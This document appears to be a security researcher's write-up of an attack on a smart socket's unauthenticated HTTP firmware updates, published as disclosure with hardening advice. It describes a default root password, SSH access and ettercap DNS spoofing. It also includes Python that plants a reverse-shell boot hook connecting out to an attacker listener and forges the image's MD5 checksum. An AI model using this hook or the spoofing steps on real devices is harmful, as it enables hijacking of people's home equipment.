In recent years the smart home has become increasingly popular, and a whole range of products has appeared: smart TVs, smart sockets, smart light bulbs, smart door locks, smart cameras. The smart home brings convenience to daily life and endless room for imagination about the future. However, the security of most smart home products is worrying; they are, so to speak, a hidden bomb on an airplane that may go off at any time.
Many security researchers have started to pay attention to the security of intelligent devices, for example the recent research by the mythical ghost axe laboratory on automobile anti-theft systems. We are also following and researching this area; for some of our results, see the article "Hidden crisis - smart device security" by the Internet of Things security joint research team.
Some time ago the author took part in this year's GeekPwn (a competition focused on the security of smart living) with the team, analysed a certain smart socket and found several problems, but during the competition an accident caused the demonstration to fail. That does not matter much: this article uses the problems found in this smart socket to explore the security of smart living. GeekPwn has officially reported the vulnerability discussed here to the manufacturer for repair.
[Discovery]
The control diagram of the socket is as follows:
Process:
1) The mobile app is configured over the WiFi network provided by the smart socket and tells the socket the router's WiFi password;
2) The smart socket connects to the server through the router;
3) The mobile app and the smart socket are both connected to the server and communicate over XMPP; this is the channel through which the app controls and upgrades the socket.
The firmware upgrade process is separate: the phone sends an upgrade request to the server, the server sends the address of the new firmware to the smart socket, and the socket downloads the firmware itself and performs the upgrade.
During a firmware upgrade we can observe that the smart socket downloads the firmware image y2.bin and its checksum file y2.bin.md5 from a fixed URL over plain HTTP. Obviously this opens the possibility of a man-in-the-middle attack: the checksum travels over the same unauthenticated channel as the image, so whoever can replace one can replace the other.
[Further analysis]
Extracting the upgrade firmware y2.bin with binwalk shows that the socket runs OpenWrt.
Checking the shadow file reveals the default root password, p9zxxx.
An nmap scan shows that the socket exposes TCP port 22 (SSH).
So I decided to try it: SSH login succeeds directly. From there the firmware can be reflashed with the system's own sysupgrade. This process does not check whether the firmware being flashed is newer than the currently installed version, so there is a firmware downgrade vulnerability.
Embed reverse-shell code in the extracted firmware and repack it. OpenWrt's own nc has no -e option, but a trick can be used to bind the specified port, as shown in the figure below. See this article for the method of repacking an OpenWrt squashfs ROM. The author managed to brick two sockets along the way.
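As an added example (not the author's firmware, script or figure), the following Python prepares the two artefacts the attack needs: the boot-time hook that wires /bin/sh to nc through a FIFO, since the BusyBox nc on the socket has no -e, and the md5sum-style y2.bin.md5 sidecar that must accompany the repacked image because that checksum is the only thing the socket verifies. The listener address, the /tmp/.f FIFO path and the y2.bin file name are assumptions; repacking the modified rootfs into a flashable image follows the squashfs article referenced above and is not reproduced here.

```python
import hashlib
import os

# Placeholders (assumptions): where the attacker's nc listener is waiting.
ATTACKER_HOST = "203.0.113.10"
ATTACKER_PORT = 4444


def build_rc_local(host, port):
    """Contents for /etc/rc.local, which OpenWrt runs from /etc/init.d/done
    at the end of boot.  BusyBox nc lacks -e, so the shell is connected to
    the socket through a FIFO; the loop reconnects if the listener drops."""
    return f"""# connect-back shell (added example payload, not original firmware content)
(
  while true; do
    rm -f /tmp/.f; mkfifo /tmp/.f
    cat /tmp/.f | /bin/sh -i 2>&1 | nc {host} {port} > /tmp/.f
    sleep 30
  done
) &
exit 0
"""


def inject_reverse_shell(rootfs_dir, host=ATTACKER_HOST, port=ATTACKER_PORT):
    """Drop the hook into an extracted squashfs root (e.g. binwalk's output dir)."""
    path = os.path.join(rootfs_dir, "etc", "rc.local")
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(build_rc_local(host, port))
    os.chmod(path, 0o755)
    return path


def md5_sidecar(image_bytes, name="y2.bin"):
    """y2.bin.md5 in the format md5sum writes ('<hex>  <name>').  The socket
    compares the image against this file only, so the attacker regenerates it
    for the repacked image and serves both through the spoofed URL."""
    return hashlib.md5(image_bytes).hexdigest() + "  " + name + "\n"
```

After `inject_reverse_shell("squashfs-root")` the directory is repacked into a new y2.bin; `md5_sidecar(open("y2.bin", "rb").read())` then yields the y2.bin.md5 to serve next to it.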
[An actual penetration test]
Next, build an environment for a man-in-the-middle attack. Because it is not convenient to modify HTTP packets on the router, DNS spoofing on the LAN was used instead. The network environment is shown in the figure.
An attacker on the same LAN uses ettercap's dns_spoof plugin to carry out the attack.
The user now sends the firmware upgrade command to the socket from the mobile app. As can be seen, DNS spoofing succeeds twice: once for y2.bin and once for y2.bin.md5. Since the checksum is fetched through the same spoofed name, the attacker simply serves the MD5 of the modified image alongside it.
After the firmware is updated the socket restarts, and the host on the public Internet receives the reverse shell, as shown in the figure below.
Due to limited conditions, only the DNS spoofing scenario is demonstrated. Other man-in-the-middle options include rewriting the request URL on the router or in the backbone network, or using ARP spoofing to modify the data returned by the HTTP request. Clearly it is unwise for a smart socket to fetch firmware over HTTP without effective file verification, for example a digital signature based on an asymmetric algorithm, checked against a public key stored in the device rather than anything fetched over the same channel.
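To make the point of the upgrade analysis and of the recommendation above concrete, here is an added simulation (not code from the original post or from the socket vendor) that contrasts the socket's check, an MD5 sidecar fetched next to the image, with a signature verified against a key pinned in the device. The URLs, firmware bytes and keys are constructed for the demonstration; the RSA is textbook (no padding) so that the trust model stays visible, and is not a production signing scheme.

```python
import hashlib
import secrets

FIRMWARE_URL = "http://update.example.invalid/y2.bin"  # placeholder, not the real host
SIDECAR_URL = FIRMWARE_URL + ".md5"
SIG_URL = FIRMWARE_URL + ".sig"  # hypothetical: what a signed update scheme would add


def _is_probable_prime(n, rounds=16):
    """Miller-Rabin, adequate for a demo key."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _gen_prime(bits):
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand


def rsa_keygen(bits=1024):
    """Textbook RSA (no padding), demo only. Returns (public (e, n), private (d, n))."""
    e = 65537
    while True:
        p, q = _gen_prime(bits // 2), _gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (e, p * q), (pow(e, -1, phi), p * q)


def _digest_int(data):
    return int.from_bytes(hashlib.sha256(data).digest(), "big")


def rsa_sign(priv, data):
    d, n = priv
    return pow(_digest_int(data), d, n)


def rsa_verify(pub, data, sig):
    e, n = pub
    return pow(sig, e, n) == _digest_int(data)


# --- the two device-side policies being compared ---
def check_md5_sidecar(fw, sidecar_text):
    """What the socket does: trust an md5sum-style file fetched next to the image."""
    return hashlib.md5(fw).hexdigest() == sidecar_text.split()[0]


def check_signature(fw, sig_hex, pinned_pub):
    """Hardened: the only trust anchor is a public key that never crosses HTTP."""
    return rsa_verify(pinned_pub, fw, int(sig_hex, 16))


# --- vendor server, man-in-the-middle, device ---
def vendor_publish(vendor_priv, fw):
    return {FIRMWARE_URL: fw,
            SIDECAR_URL: hashlib.md5(fw).hexdigest() + "  y2.bin\n",
            SIG_URL: "%x" % rsa_sign(vendor_priv, fw)}


def mitm_replace(evil_fw, attacker_priv):
    """DNS spoofing lets the attacker answer every URL: regenerating .md5 is
    trivial, and the best it can do for .sig is to sign with its own key."""
    return {FIRMWARE_URL: evil_fw,
            SIDECAR_URL: hashlib.md5(evil_fw).hexdigest() + "  y2.bin\n",
            SIG_URL: "%x" % rsa_sign(attacker_priv, evil_fw)}


def device_update(served, policy, pinned_pub):
    """True if the device would flash the image it was served under this policy."""
    fw = served[FIRMWARE_URL]
    if policy == "md5-sidecar":
        return check_md5_sidecar(fw, served[SIDECAR_URL])
    if policy == "signature":
        return check_signature(fw, served[SIG_URL], pinned_pub)
    raise ValueError(policy)


def run_scenarios():
    vendor_pub, vendor_priv = rsa_keygen(1024)  # vendor_pub is burned into the image
    _, attacker_priv = rsa_keygen(512)
    genuine = b"OPENWRT-SOCKET-FW-2.0" + bytes(64)  # constructed stand-in images
    evil = b"OPENWRT-SOCKET-FW-1.0+rc.local-reverse-shell" + bytes(64)
    legit = vendor_publish(vendor_priv, genuine)
    spoofed = mitm_replace(evil, attacker_priv)
    return {
        "md5-sidecar/genuine": device_update(legit, "md5-sidecar", vendor_pub),
        "md5-sidecar/mitm": device_update(spoofed, "md5-sidecar", vendor_pub),
        "signature/genuine": device_update(legit, "signature", vendor_pub),
        "signature/mitm": device_update(spoofed, "signature", vendor_pub),
    }
```

`run_scenarios()` accepts the spoofed image under the MD5 sidecar policy and rejects it under the signature policy, while genuine firmware passes both; the difference is entirely in where the trust anchor lives. In a real device the same idea is implemented with a proper signature scheme (for example the signing tools OpenWrt itself uses for packages) and a key that can only be replaced by a signed update.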
[Conclusion]
Smart hardware carries many security risks, affecting not only user privacy but also personal safety. As in the plot of the TV series Cybercrime Investigation (CSI: Cyber), a criminal remotely takes over a baby camera, learns the parents' routine and steals the baby while they are asleep.
In addition, five students from Tencent's Internet of Things security research team took part in GeekPwn and demonstrated their project (remember the drone hijacking?). The technical write-up will be shared on the TSRC blog later; please stay tuned.
Finally, we hope that smart hardware manufacturers will pay more attention to security and deliver a secure smart life. We will also do our part to help the industry build a more secure Internet of Things.